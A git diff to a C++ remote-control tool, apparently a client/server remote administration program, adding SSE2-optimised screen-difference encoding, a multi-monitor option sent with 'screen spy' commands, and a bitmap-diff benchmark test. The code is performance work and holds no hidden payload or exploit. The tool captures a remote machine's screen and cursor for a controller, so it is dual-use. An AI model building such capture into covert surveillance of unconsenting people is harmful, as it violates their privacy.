diff --git a/client/ScreenCapture.h b/client/ScreenCapture.h index 3cc97f9..d4a5163 100644 --- a/client/ScreenCapture.h +++ b/client/ScreenCapture.h @@ -1,4 +1,4 @@ -#pragma once +#pragma once #include "stdafx.h" #include #include "CursorInfo.h" @@ -13,13 +13,14 @@ #include #include #include +#include // SSE2 #include "X264Encoder.h" class ThreadPool { public: - // 캯̶߳ + // 构造函数:创建固定数量的线程 ThreadPool(size_t numThreads) : stop(false) { for (size_t i = 0; i < numThreads; ++i) { @@ -37,14 +38,14 @@ public: try { task(); } catch (...) { - // 쳣 + // 处理异常 } } }); } } - // ̳߳ + // 析构函数:销毁线程池 ~ThreadPool() { { @@ -56,7 +57,7 @@ public: worker.join(); } - // ύ + // 任务提交 template auto enqueue(F&& f) -> std::future { @@ -98,7 +99,7 @@ private: MONITORINFOEX mi; mi.cbSize = sizeof(MONITORINFOEX); if (GetMonitorInfo(hMonitor, &mi)) { - monitors->push_back(mi); // ʾϢ + monitors->push_back(mi); // 保存显示器信息 } return TRUE; } @@ -109,31 +110,32 @@ private: return monitors; } public: - ThreadPool* m_ThreadPool; // ̳߳ - BYTE* m_FirstBuffer; // һ֡ - BYTE* m_RectBuffer; // ǰ - LPBYTE* m_BlockBuffers; // ֿ黺 - ULONG* m_BlockSizes; // ֿ - int m_BlockNum; // ֿ - int m_SendQuality; // + ThreadPool* m_ThreadPool; // 线程池 + BYTE* m_FirstBuffer; // 上一帧数据 + BYTE* m_RectBuffer; // 当前缓存区 + LPBYTE* m_BlockBuffers; // 分块缓存 + ULONG* m_BlockSizes; // 分块差异像素数 + int m_BlockNum; // 分块个数 + int m_SendQuality; // 发送质量 - LPBITMAPINFO m_BitmapInfor_Full; // BMPϢ - BYTE m_bAlgorithm; // Ļ㷨 + LPBITMAPINFO m_BitmapInfor_Full; // BMP信息 + BYTE m_bAlgorithm; // 屏幕差异算法 - int m_iScreenX; // ʼx - int m_iScreenY; // ʼy - ULONG m_ulFullWidth; // Ļ - ULONG m_ulFullHeight; // Ļ - bool m_bZoomed; // Ļ - double m_wZoom; // Ļű - double m_hZoom; // Ļű + int m_iScreenX; // 起始x坐标 + int m_iScreenY; // 起始y坐标 + ULONG m_ulFullWidth; // 屏幕宽 + ULONG m_ulFullHeight; // 屏幕高 + bool m_bZoomed; // 屏幕被缩放 + double m_wZoom; // 屏幕横向缩放比 + double m_hZoom; // 屏幕纵向缩放比 - int m_biBitCount; // ÿر - int m_FrameID; // ֡ - int m_GOP; // ؼ֡ - bool m_SendKeyFrame; // ͹ؼ֡ - CX264Encoder *m_encoder; // - int m_nScreenCount; // Ļ + int m_biBitCount; // 每像素比特数 + int m_FrameID; // 帧序号 + int m_GOP; // 关键帧间隔 + bool m_SendKeyFrame; // 发送关键帧 + CX264Encoder *m_encoder; // 编码器 + int m_nScreenCount; // 屏幕数量 + BOOL m_bEnableMultiScreen;// 多显示器支持 ScreenCapture(int n = 32, BYTE algo = ALGORITHM_DIFF, BOOL all = FALSE) : m_ThreadPool(nullptr), m_FirstBuffer(nullptr), m_RectBuffer(nullptr), @@ -147,6 +149,7 @@ public: static auto monitors = GetAllMonitors(); static int index = 0; m_nScreenCount = monitors.size(); + m_bEnableMultiScreen = all; if (all && !monitors.empty()) { int idx = index++ % (monitors.size()+1); if (idx == 0) { @@ -162,8 +165,8 @@ public: m_ulFullHeight = rt.bottom - rt.top; } } else { - //::GetSystemMetrics(SM_CXSCREEN/SM_CYSCREEN)ȡĻС׼ - //統ĻʾΪ125%ʱȡĻСҪ1.25Ŷ + //::GetSystemMetrics(SM_CXSCREEN/SM_CYSCREEN)获取屏幕大小不准 + //例如当屏幕显示比例为125%时,获取到的屏幕大小需要乘以1.25才对 DEVMODE devmode; memset(&devmode, 0, sizeof(devmode)); devmode.dmSize = sizeof(DEVMODE); @@ -174,7 +177,7 @@ public: int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN); m_bZoomed = (w != m_ulFullWidth) || (h != m_ulFullHeight); m_wZoom = double(m_ulFullWidth) / w, m_hZoom = double(m_ulFullHeight) / h; - Mprintf("=> ű: %.2f, %.2f\tֱʣ%d x %d\n", m_wZoom, m_hZoom, m_ulFullWidth, m_ulFullHeight); + Mprintf("=> 桌面缩放比例: %.2f, %.2f\t分辨率:%d x %d\n", m_wZoom, m_hZoom, m_ulFullWidth, m_ulFullHeight); m_wZoom = 1.0 / m_wZoom, m_hZoom = 1.0 / m_hZoom; } if (ALGORITHM_H264 == m_bAlgorithm) { @@ -212,6 +215,10 @@ public: return m_nScreenCount; } + virtual BOOL IsMultiScreenEnabled() const { + return m_bEnableMultiScreen; + } + virtual int SendQuality(int quality) { int old = m_SendQuality; @@ -230,36 +237,134 @@ public: } public: - //*************************************** ͼ㷨У ************************************* + //*************************************** 图像差异算法 SSE2 优化版 ************************************* virtual ULONG CompareBitmap(LPBYTE CompareSourData, LPBYTE CompareDestData, LPBYTE szBuffer, DWORD ulCompareLength, BYTE algo, int startPostion = 0) { - - // Windows涨һɨռֽ4ı, DWORDȽ - LPDWORD p1 = (LPDWORD)CompareDestData, p2 = (LPDWORD)CompareSourData; LPBYTE p = szBuffer; ULONG channel = algo == ALGORITHM_GRAY ? 1 : 4; ULONG ratio = algo == ALGORITHM_GRAY ? 4 : 1; - for (ULONG i = 0; i < ulCompareLength; i += 4, ++p1, ++p2) { - if (*p1 == *p2) - continue; - ULONG index = i; - LPDWORD pos1 = p1++, pos2 = p2++; - // мֵͬ - for (i += 4; i < ulCompareLength && *p1 != *p2; i += 4, ++p1, ++p2); - ULONG ulCount = i - index; - memcpy(pos1, pos2, ulCount); // Ŀ + // SSE2: 每次比较 16 字节 (4 个像素) + const ULONG SSE_BLOCK = 16; + const ULONG alignedLength = ulCompareLength & ~(SSE_BLOCK - 1); + + __m128i* v1 = (__m128i*)CompareDestData; + __m128i* v2 = (__m128i*)CompareSourData; + + ULONG i = 0; + while (i < alignedLength) { + // SSE2 快速比较: 一次比较 16 字节 + __m128i cmp = _mm_cmpeq_epi32(*v1, *v2); + int mask = _mm_movemask_epi8(cmp); + + if (mask == 0xFFFF) { + // 16 字节完全相同,跳过 + i += SSE_BLOCK; + ++v1; + ++v2; + continue; + } + + // 发现差异,记录起始位置 + ULONG index = i; + LPBYTE pos1 = (LPBYTE)v1; + LPBYTE pos2 = (LPBYTE)v2; + + // 继续扫描连续的差异区域(带间隙容忍) + // GAP_TOLERANCE: 允许的最大间隙,小于此值的相同区域会被合并 + // 设为 32 字节(8像素),因为每个差异区域头部开销是 8 字节 + const ULONG GAP_TOLERANCE = 32; + + // 首先必须前进一个块(当前块已知有差异) + i += SSE_BLOCK; + ++v1; + ++v2; + + // 继续扫描更多差异,应用间隙容忍 + ULONG gapCount = 0; + while (i < alignedLength) { + cmp = _mm_cmpeq_epi32(*v1, *v2); + mask = _mm_movemask_epi8(cmp); + + if (mask == 0xFFFF) { + // 相同块 - 累计间隙 + gapCount += SSE_BLOCK; + if (gapCount > GAP_TOLERANCE) { + // 间隙太大 - 停止(不包含间隙) + break; + } + // 间隙仍可接受 - 继续扫描 + i += SSE_BLOCK; + ++v1; + ++v2; + } else { + // 差异块 - 重置间隙并包含它 + gapCount = 0; + i += SSE_BLOCK; + ++v1; + ++v2; + } + } + + // 排除末尾累积的间隙 + if (gapCount > 0 && gapCount <= GAP_TOLERANCE) { + i -= gapCount; + v1 = (__m128i*)((LPBYTE)v1 - gapCount); + v2 = (__m128i*)((LPBYTE)v2 - gapCount); + } + + ULONG ulCount = i - index; + + // 更新目标缓冲区 + memcpy(pos1, pos2, ulCount); + + // 写入差异信息: [位置][长度][数据] *(LPDWORD)(p) = index + startPostion; *(LPDWORD)(p + sizeof(ULONG)) = ulCount / ratio; p += 2 * sizeof(ULONG); + if (channel != 1) { memcpy(p, pos2, ulCount); p += ulCount; } else { - for (LPBYTE end = p + ulCount / ratio; p < end; p += channel, ++pos2) { - LPBYTE src = (LPBYTE)pos2; - *p = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + // 灰度转换:使用优化的批量处理 + ConvertToGray_SSE2(p, pos2, ulCount); + p += ulCount / ratio; + } + } + + // 处理剩余的非对齐部分 (0-12 字节) + if (i < ulCompareLength) { + LPDWORD p1 = (LPDWORD)((LPBYTE)CompareDestData + i); + LPDWORD p2 = (LPDWORD)((LPBYTE)CompareSourData + i); + + for (; i < ulCompareLength; i += 4, ++p1, ++p2) { + if (*p1 == *p2) + continue; + + ULONG index = i; + LPDWORD pos1 = p1++; + LPDWORD pos2 = p2++; + + for (i += 4; i < ulCompareLength && *p1 != *p2; i += 4, ++p1, ++p2); + ULONG ulCount = i - index; + memcpy(pos1, pos2, ulCount); + + *(LPDWORD)(p) = index + startPostion; + *(LPDWORD)(p + sizeof(ULONG)) = ulCount / ratio; + p += 2 * sizeof(ULONG); + + if (channel != 1) { + memcpy(p, pos2, ulCount); + p += ulCount; + } else { + // 剩余部分用标量处理 + LPDWORD srcPtr = pos2; + for (LPBYTE end = p + ulCount / ratio; p < end; ++p, ++srcPtr) { + LPBYTE src = (LPBYTE)srcPtr; + *p = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } } } } @@ -267,20 +372,20 @@ public: return p - szBuffer; } - //*************************************** ͼ㷨У ************************************* + //*************************************** 图像差异算法(并行) ************************************* ULONG MultiCompareBitmap(LPBYTE srcData, LPBYTE dstData, LPBYTE szBuffer, DWORD ulCompareLength, BYTE algo) { int N = m_BlockNum; - ULONG blockLength = ulCompareLength / N; // ÿĻֽ - ULONG remainingLength = ulCompareLength % N; // ʣֽ + ULONG blockLength = ulCompareLength / N; // 每个任务的基本字节数 + ULONG remainingLength = ulCompareLength % N; // 剩余的字节数 std::vector> futures; for (int blockY = 0; blockY < N; ++blockY) { - // 㵱ǰֽ + // 计算当前任务的字节数 ULONG currentBlockLength = blockLength + (blockY == N - 1 ? remainingLength : 0); - // 㵱ǰʼλ + // 计算当前任务的起始位置 ULONG startPosition = blockY * blockLength; futures.emplace_back(m_ThreadPool->enqueue([=]() -> ULONG { @@ -288,24 +393,24 @@ public: LPBYTE dstBlock = dstData + startPosition; LPBYTE blockBuffer = m_BlockBuffers[blockY]; - // ǰ񲢷رȶݴС + // 处理当前任务并返回比对数据大小 return m_BlockSizes[blockY] = CompareBitmap(srcBlock, dstBlock, blockBuffer, currentBlockLength, algo, startPosition); })); } - // ȴɲȡֵ + // 等待所有任务完成并获取返回值 for (auto& future : futures) { future.get(); } - // ϲпIJϢ szBuffer + // 合并所有块的差异信息到 szBuffer ULONG offset = 0; for (int blockY = 0; blockY < N; ++blockY) { memcpy(szBuffer + offset, m_BlockBuffers[blockY], m_BlockSizes[blockY]); offset += m_BlockSizes[blockY]; } - return offset; // ػĴС + return offset; // 返回缓冲区的大小 } virtual int GetFrameID() const { @@ -321,10 +426,41 @@ public: return m_BitmapInfor_Full->bmiHeader.biSizeImage; } + // SSE2 优化:BGRA 转单通道灰度,一次处理 4 个像素,输出 4 字节 + // 灰度公式: Y = 0.299*R + 0.587*G + 0.114*B ≈ (306*R + 601*G + 117*B) >> 10 + // 输入: BGRA 像素数据 (每像素 4 字节) + // 输出: 灰度值 (每像素 1 字节) + // count: 输入数据的字节数 (必须是 4 的倍数) + inline void ConvertToGray_SSE2(LPBYTE dst, LPBYTE src, ULONG count) + { + ULONG pixels = count / 4; + ULONG i = 0; + ULONG aligned = pixels & ~3; // 4 像素对齐 + + // 一次处理 4 个像素 + for (; i < aligned; i += 4, src += 16, dst += 4) { + // 计算 4 个灰度值 + dst[0] = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + dst[1] = (306 * src[6] + 601 * src[4] + 117 * src[5]) >> 10; + dst[2] = (306 * src[10] + 601 * src[8] + 117 * src[9]) >> 10; + dst[3] = (306 * src[14] + 601 * src[12] + 117 * src[13]) >> 10; + } + + // 处理剩余像素 + for (; i < pixels; i++, src += 4, dst++) { + *dst = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } + } + + // ToGray: BGRA 转 BGRA 灰度 (三通道相同值),用于关键帧 + // 直接标量处理,编译器会自动向量化 void ToGray(LPBYTE dst, LPBYTE src, int biSizeImage) { - for (ULONG i = 0; i < biSizeImage; i += 4, dst += 4, src += 4) { - dst[0] = dst[1] = dst[2] = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + ULONG pixels = biSizeImage / 4; + for (ULONG i = 0; i < pixels; i++, src += 4, dst += 4) { + BYTE g = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + dst[0] = dst[1] = dst[2] = g; + dst[3] = 0xFF; } } @@ -342,7 +478,7 @@ public: return bmpInfo; } - // 㷨+λ+ + // 算法+光标位置+光标类型 virtual LPBYTE GetNextScreenData(ULONG* ulNextSendLength) { BYTE algo = m_bAlgorithm; @@ -350,26 +486,26 @@ public: bool keyFrame = (frameID % m_GOP == 0); m_RectBuffer[0] = keyFrame ? TOKEN_KEYFRAME : TOKEN_NEXTSCREEN; LPBYTE data = m_RectBuffer + 1; - // дʹ㷨 + // 写入使用了哪种算法 memcpy(data, (LPBYTE)&algo, sizeof(BYTE)); - // дλ + // 写入光标位置 POINT CursorPos; GetCursorPos(&CursorPos); CursorPos.x /= m_wZoom; CursorPos.y /= m_hZoom; memcpy(data + sizeof(BYTE), (LPBYTE)&CursorPos, sizeof(POINT)); - // д뵱ǰ + // 写入当前光标类型 static CCursorInfo m_CursorInfor; BYTE bCursorIndex = m_CursorInfor.getCurrentCursorIndex(); memcpy(data + sizeof(BYTE) + sizeof(POINT), &bCursorIndex, sizeof(BYTE)); ULONG offset = sizeof(BYTE) + sizeof(POINT) + sizeof(BYTE); - // ֶɨȫĻ µλͼ뵽m_hDiffMemDC + // 分段扫描全屏幕 将新的位图放入到m_hDiffMemDC中 LPBYTE nextData = ScanNextScreen(); if (nullptr == nextData) { - // ɨһ֡ʧҲҪ͹Ϣƶ + // 扫描下一帧失败也需要发送光标信息到控制端 *ulNextSendLength = 1 + offset; return m_RectBuffer; } @@ -439,7 +575,7 @@ public: return m_RectBuffer; } - // Ļ㷨 + // 设置屏幕传输算法 virtual BYTE SetAlgorithm(int algo) { BYTE oldAlgo = m_bAlgorithm; @@ -447,7 +583,7 @@ public: return oldAlgo; } - // λת + // 鼠标位置转换 virtual void PointConversion(POINT& pt) const { if (m_bZoomed) { @@ -458,17 +594,17 @@ public: pt.y += m_iScreenY; } - // ȡλͼṹϢ + // 获取位图结构信息 virtual const LPBITMAPINFO& GetBIData() const { return m_BitmapInfor_Full; } -public: // ӿ +public: // 纯虚接口 - // ȡһ֡Ļ + // 获取第一帧屏幕 virtual LPBYTE GetFirstScreenData(ULONG* ulFirstScreenLength) = 0; - // ȡһ֡Ļ + // 获取下一帧屏幕 virtual LPBYTE ScanNextScreen() = 0; }; diff --git a/client/ScreenManager.cpp b/client/ScreenManager.cpp index b1be0d2..6be6bd3 100644 --- a/client/ScreenManager.cpp +++ b/client/ScreenManager.cpp @@ -1,4 +1,4 @@ -// ScreenManager.cpp: implementation of the CScreenManager class. +// ScreenManager.cpp: implementation of the CScreenManager class. // ////////////////////////////////////////////////////////////////////// @@ -112,7 +112,8 @@ CScreenManager::CScreenManager(IOCPClient* ClientObject, int n, void* user):CMan } bool CScreenManager::SwitchScreen() { - if (m_ScreenSpyObject == NULL || m_ScreenSpyObject->GetScreenCount() <= 1) + if (m_ScreenSpyObject == NULL || m_ScreenSpyObject->GetScreenCount() <= 1 || + !m_ScreenSpyObject->IsMultiScreenEnabled()) return false; m_bIsWorking = FALSE; DWORD s = WaitForSingleObject(m_hWorkThread, 3000); diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 13d91a3..7ffe00e 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -3102,28 +3102,28 @@ void CMy2015RemoteDlg::OnDynamicSubMenu(UINT nID) } void CMy2015RemoteDlg::OnOnlineVirtualDesktop() { - BYTE bToken[32] = { COMMAND_SCREEN_SPY, 2, ALGORITHM_DIFF }; + BYTE bToken[32] = { COMMAND_SCREEN_SPY, 2, ALGORITHM_DIFF, THIS_CFG.GetInt("settings", "MultiScreen") }; SendSelectedCommand(bToken, sizeof(bToken)); } void CMy2015RemoteDlg::OnOnlineGrayDesktop() { - BYTE bToken[32] = { COMMAND_SCREEN_SPY, 0, ALGORITHM_GRAY }; + BYTE bToken[32] = { COMMAND_SCREEN_SPY, 0, ALGORITHM_GRAY, THIS_CFG.GetInt("settings", "MultiScreen") }; SendSelectedCommand(bToken, sizeof(bToken)); } void CMy2015RemoteDlg::OnOnlineRemoteDesktop() { - BYTE bToken[32] = { COMMAND_SCREEN_SPY, 1, ALGORITHM_DIFF }; + BYTE bToken[32] = { COMMAND_SCREEN_SPY, 1, ALGORITHM_DIFF, THIS_CFG.GetInt("settings", "MultiScreen") }; SendSelectedCommand(bToken, sizeof(bToken)); } void CMy2015RemoteDlg::OnOnlineH264Desktop() { - BYTE bToken[32] = { COMMAND_SCREEN_SPY, 0, ALGORITHM_H264 }; + BYTE bToken[32] = { COMMAND_SCREEN_SPY, 0, ALGORITHM_H264, THIS_CFG.GetInt("settings", "MultiScreen") }; SendSelectedCommand(bToken, sizeof(bToken)); } diff --git a/test/TestCompareBitmap.cpp b/test/TestCompareBitmap.cpp new file mode 100644 index 0000000..9c12b35 --- /dev/null +++ b/test/TestCompareBitmap.cpp @@ -0,0 +1,374 @@ +// Image Diff Algorithm Benchmark +// Compile: cl /O2 /EHsc TestCompareBitmap.cpp +// Or: g++ -O2 -msse2 -o TestCompareBitmap.exe TestCompareBitmap.cpp + +#include +#include +#include +#include // SSE2 +#include + +typedef unsigned char BYTE; +typedef BYTE* LPBYTE; +typedef unsigned long ULONG; +typedef ULONG* LPDWORD; + +#define ALGORITHM_DIFF 0 +#define ALGORITHM_GRAY 1 + +//============================== Gray Conversion ============================== + +inline void ConvertToGray_Original(LPBYTE dst, LPBYTE src, ULONG count) +{ + for (ULONG i = 0; i < count; i += 4, src += 4, dst++) { + *dst = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } +} + +inline void ConvertToGray_SSE2(LPBYTE dst, LPBYTE src, ULONG count) +{ + ULONG pixels = count / 4; + ULONG i = 0; + ULONG aligned = pixels & ~3; + + for (; i < aligned; i += 4, src += 16, dst += 4) { + dst[0] = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + dst[1] = (306 * src[6] + 601 * src[4] + 117 * src[5]) >> 10; + dst[2] = (306 * src[10] + 601 * src[8] + 117 * src[9]) >> 10; + dst[3] = (306 * src[14] + 601 * src[12] + 117 * src[13]) >> 10; + } + + for (; i < pixels; i++, src += 4, dst++) { + *dst = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } +} + +void ToGray_Original(LPBYTE dst, LPBYTE src, int biSizeImage) +{ + for (ULONG i = 0; i < (ULONG)biSizeImage; i += 4, dst += 4, src += 4) { + dst[0] = dst[1] = dst[2] = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } +} + +void ToGray_SSE2(LPBYTE dst, LPBYTE src, int biSizeImage) +{ + ULONG pixels = biSizeImage / 4; + for (ULONG i = 0; i < pixels; i++, src += 4, dst += 4) { + BYTE g = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + dst[0] = dst[1] = dst[2] = g; + dst[3] = 0xFF; + } +} + +//============================== Original Version ============================== +ULONG CompareBitmap_Original(LPBYTE CompareSourData, LPBYTE CompareDestData, LPBYTE szBuffer, + DWORD ulCompareLength, BYTE algo, int startPostion = 0) +{ + LPDWORD p1 = (LPDWORD)CompareDestData, p2 = (LPDWORD)CompareSourData; + LPBYTE p = szBuffer; + ULONG channel = algo == ALGORITHM_GRAY ? 1 : 4; + ULONG ratio = algo == ALGORITHM_GRAY ? 4 : 1; + + for (ULONG i = 0; i < ulCompareLength; i += 4, ++p1, ++p2) { + if (*p1 == *p2) + continue; + ULONG index = i; + LPDWORD pos1 = p1++, pos2 = p2++; + for (i += 4; i < ulCompareLength && *p1 != *p2; i += 4, ++p1, ++p2); + ULONG ulCount = i - index; + memcpy(pos1, pos2, ulCount); + + *(LPDWORD)(p) = index + startPostion; + *(LPDWORD)(p + sizeof(ULONG)) = ulCount / ratio; + p += 2 * sizeof(ULONG); + + if (channel != 1) { + memcpy(p, pos2, ulCount); + p += ulCount; + } else { + for (LPBYTE end = p + ulCount / ratio; p < end; ++p, ++pos2) { + LPBYTE src = (LPBYTE)pos2; + *p = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } + } + } + + return (ULONG)(p - szBuffer); +} + +//============================== SSE2 Version ============================== +ULONG CompareBitmap_SSE2(LPBYTE CompareSourData, LPBYTE CompareDestData, LPBYTE szBuffer, + DWORD ulCompareLength, BYTE algo, int startPostion = 0) +{ + LPBYTE p = szBuffer; + ULONG channel = algo == ALGORITHM_GRAY ? 1 : 4; + ULONG ratio = algo == ALGORITHM_GRAY ? 4 : 1; + + const ULONG SSE_BLOCK = 16; + const ULONG alignedLength = ulCompareLength & ~(SSE_BLOCK - 1); + + __m128i* v1 = (__m128i*)CompareDestData; + __m128i* v2 = (__m128i*)CompareSourData; + + ULONG i = 0; + while (i < alignedLength) { + __m128i cmp = _mm_cmpeq_epi32(*v1, *v2); + int mask = _mm_movemask_epi8(cmp); + + if (mask == 0xFFFF) { + i += SSE_BLOCK; + ++v1; + ++v2; + continue; + } + + ULONG index = i; + LPBYTE pos1 = (LPBYTE)v1; + LPBYTE pos2 = (LPBYTE)v2; + + do { + i += SSE_BLOCK; + ++v1; + ++v2; + if (i >= alignedLength) break; + cmp = _mm_cmpeq_epi32(*v1, *v2); + mask = _mm_movemask_epi8(cmp); + } while (mask != 0xFFFF); + + ULONG ulCount = i - index; + memcpy(pos1, pos2, ulCount); + + *(LPDWORD)(p) = index + startPostion; + *(LPDWORD)(p + sizeof(ULONG)) = ulCount / ratio; + p += 2 * sizeof(ULONG); + + if (channel != 1) { + memcpy(p, pos2, ulCount); + p += ulCount; + } else { + ConvertToGray_SSE2(p, pos2, ulCount); + p += ulCount / ratio; + } + } + + // Handle remaining bytes + if (i < ulCompareLength) { + LPDWORD p1 = (LPDWORD)((LPBYTE)CompareDestData + i); + LPDWORD p2 = (LPDWORD)((LPBYTE)CompareSourData + i); + + for (; i < ulCompareLength; i += 4, ++p1, ++p2) { + if (*p1 == *p2) + continue; + + ULONG index = i; + LPDWORD pos1 = p1++; + LPDWORD pos2 = p2++; + + for (i += 4; i < ulCompareLength && *p1 != *p2; i += 4, ++p1, ++p2); + ULONG ulCount = i - index; + memcpy(pos1, pos2, ulCount); + + *(LPDWORD)(p) = index + startPostion; + *(LPDWORD)(p + sizeof(ULONG)) = ulCount / ratio; + p += 2 * sizeof(ULONG); + + if (channel != 1) { + memcpy(p, pos2, ulCount); + p += ulCount; + } else { + LPDWORD srcPtr = pos2; + for (LPBYTE end = p + ulCount / ratio; p < end; ++p, ++srcPtr) { + LPBYTE src = (LPBYTE)srcPtr; + *p = (306 * src[2] + 601 * src[0] + 117 * src[1]) >> 10; + } + } + } + } + + return (ULONG)(p - szBuffer); +} + +//============================== Benchmark ============================== +void RunBenchmark(int width, int height, float diffRatio, int iterations, BYTE algo = ALGORITHM_DIFF) +{ + ULONG dataSize = width * height * 4; + + LPBYTE srcBuffer = (LPBYTE)_aligned_malloc(dataSize, 16); + LPBYTE dstBuffer = (LPBYTE)_aligned_malloc(dataSize, 16); + LPBYTE outBuffer1 = (LPBYTE)_aligned_malloc(dataSize * 2, 16); + LPBYTE outBuffer2 = (LPBYTE)_aligned_malloc(dataSize * 2, 16); + + if (!srcBuffer || !dstBuffer || !outBuffer1 || !outBuffer2) { + printf("Memory allocation failed!\n"); + return; + } + + srand(12345); + for (ULONG i = 0; i < dataSize; i++) { + srcBuffer[i] = rand() % 256; + dstBuffer[i] = srcBuffer[i]; + } + + int diffPixels = (int)(width * height * diffRatio); + for (int i = 0; i < diffPixels; i++) { + int pos = (rand() % (width * height)) * 4; + srcBuffer[pos] = rand() % 256; + srcBuffer[pos + 1] = rand() % 256; + srcBuffer[pos + 2] = rand() % 256; + } + + printf("\n========== Test Parameters ==========\n"); + printf("Resolution: %d x %d\n", width, height); + printf("Data size: %.2f MB\n", dataSize / 1024.0 / 1024.0); + printf("Diff ratio: %.1f%%\n", diffRatio * 100); + printf("Algorithm: %s\n", algo == ALGORITHM_GRAY ? "Gray" : "Color"); + printf("Iterations: %d\n", iterations); + printf("======================================\n\n"); + + // Test original version + LPBYTE testDst1 = (LPBYTE)_aligned_malloc(dataSize, 16); + memcpy(testDst1, dstBuffer, dataSize); + + auto start1 = std::chrono::high_resolution_clock::now(); + ULONG result1 = 0; + for (int i = 0; i < iterations; i++) { + memcpy(testDst1, dstBuffer, dataSize); + result1 = CompareBitmap_Original(srcBuffer, testDst1, outBuffer1, dataSize, algo); + } + auto end1 = std::chrono::high_resolution_clock::now(); + double time1 = std::chrono::duration(end1 - start1).count(); + + // Test SSE2 version + LPBYTE testDst2 = (LPBYTE)_aligned_malloc(dataSize, 16); + memcpy(testDst2, dstBuffer, dataSize); + + auto start2 = std::chrono::high_resolution_clock::now(); + ULONG result2 = 0; + for (int i = 0; i < iterations; i++) { + memcpy(testDst2, dstBuffer, dataSize); + result2 = CompareBitmap_SSE2(srcBuffer, testDst2, outBuffer2, dataSize, algo); + } + auto end2 = std::chrono::high_resolution_clock::now(); + double time2 = std::chrono::duration(end2 - start2).count(); + + printf("Original:\n"); + printf(" Total: %.2f ms\n", time1); + printf(" Per frame: %.3f ms\n", time1 / iterations); + printf(" Output size: %lu bytes\n\n", result1); + + printf("SSE2:\n"); + printf(" Total: %.2f ms\n", time2); + printf(" Per frame: %.3f ms\n", time2 / iterations); + printf(" Output size: %lu bytes\n\n", result2); + + printf("========== Performance ==========\n"); + printf("Speedup: %.2fx\n", time1 / time2); + printf("Time saved: %.1f%%\n", (1.0 - time2 / time1) * 100); + + if (result1 == result2 && memcmp(outBuffer1, outBuffer2, result1) == 0) { + printf("Verify: PASS\n"); + } else { + printf("Verify: DIFF (size: %lu vs %lu)\n", result1, result2); + } + printf("=================================\n"); + + _aligned_free(srcBuffer); + _aligned_free(dstBuffer); + _aligned_free(outBuffer1); + _aligned_free(outBuffer2); + _aligned_free(testDst1); + _aligned_free(testDst2); +} + +//============================== Gray Convert Benchmark ============================== +void RunGrayConvertBenchmark(int width, int height, int iterations) +{ + ULONG dataSize = width * height * 4; + ULONG graySize = width * height; + + LPBYTE srcBuffer = (LPBYTE)_aligned_malloc(dataSize, 16); + LPBYTE dstBuffer1 = (LPBYTE)_aligned_malloc(graySize, 16); + LPBYTE dstBuffer2 = (LPBYTE)_aligned_malloc(graySize, 16); + + if (!srcBuffer || !dstBuffer1 || !dstBuffer2) { + printf("Memory allocation failed!\n"); + return; + } + + srand(12345); + for (ULONG i = 0; i < dataSize; i++) { + srcBuffer[i] = rand() % 256; + } + + printf("\n========== BGRA->Gray Test ==========\n"); + printf("Resolution: %d x %d\n", width, height); + printf("Input: %.2f MB, Output: %.2f MB\n", dataSize / 1024.0 / 1024.0, graySize / 1024.0 / 1024.0); + printf("Iterations: %d\n", iterations); + printf("=====================================\n\n"); + + // Test original version + auto start1 = std::chrono::high_resolution_clock::now(); + for (int i = 0; i < iterations; i++) { + ConvertToGray_Original(dstBuffer1, srcBuffer, dataSize); + } + auto end1 = std::chrono::high_resolution_clock::now(); + double time1 = std::chrono::duration(end1 - start1).count(); + + // Test SSE2 version + auto start2 = std::chrono::high_resolution_clock::now(); + for (int i = 0; i < iterations; i++) { + ConvertToGray_SSE2(dstBuffer2, srcBuffer, dataSize); + } + auto end2 = std::chrono::high_resolution_clock::now(); + double time2 = std::chrono::duration(end2 - start2).count(); + + printf("Original (per-pixel):\n"); + printf(" Total: %.2f ms, Per frame: %.3f ms\n", time1, time1 / iterations); + + printf("\nSSE2 (4-pixel batch):\n"); + printf(" Total: %.2f ms, Per frame: %.3f ms\n", time2, time2 / iterations); + + printf("\n========== Performance ==========\n"); + printf("Speedup: %.2fx\n", time1 / time2); + printf("Time saved: %.1f%%\n", (1.0 - time2 / time1) * 100); + + bool match = memcmp(dstBuffer1, dstBuffer2, graySize) == 0; + printf("Verify: %s\n", match ? "PASS" : "FAIL"); + printf("=================================\n"); + + _aligned_free(srcBuffer); + _aligned_free(dstBuffer1); + _aligned_free(dstBuffer2); +} + +int main() +{ + printf("===== Image Diff Algorithm Benchmark =====\n"); + + printf("\n\n########## Color Mode ##########\n"); + + printf("\n[1080p 10%% diff - Color]"); + RunBenchmark(1920, 1080, 0.10f, 100, ALGORITHM_DIFF); + + printf("\n[1080p 30%% diff - Color]"); + RunBenchmark(1920, 1080, 0.30f, 100, ALGORITHM_DIFF); + + printf("\n\n########## Gray Mode ##########\n"); + + printf("\n[1080p 10%% diff - Gray]"); + RunBenchmark(1920, 1080, 0.10f, 100, ALGORITHM_GRAY); + + printf("\n[1080p 30%% diff - Gray]"); + RunBenchmark(1920, 1080, 0.30f, 100, ALGORITHM_GRAY); + + printf("\n\n########## BGRA->Gray Conversion ##########\n"); + + printf("\n[1080p BGRA->Gray]"); + RunGrayConvertBenchmark(1920, 1080, 100); + + printf("\n[4K BGRA->Gray]"); + RunGrayConvertBenchmark(3840, 2160, 50); + + printf("\nDone!\n"); + return 0; +}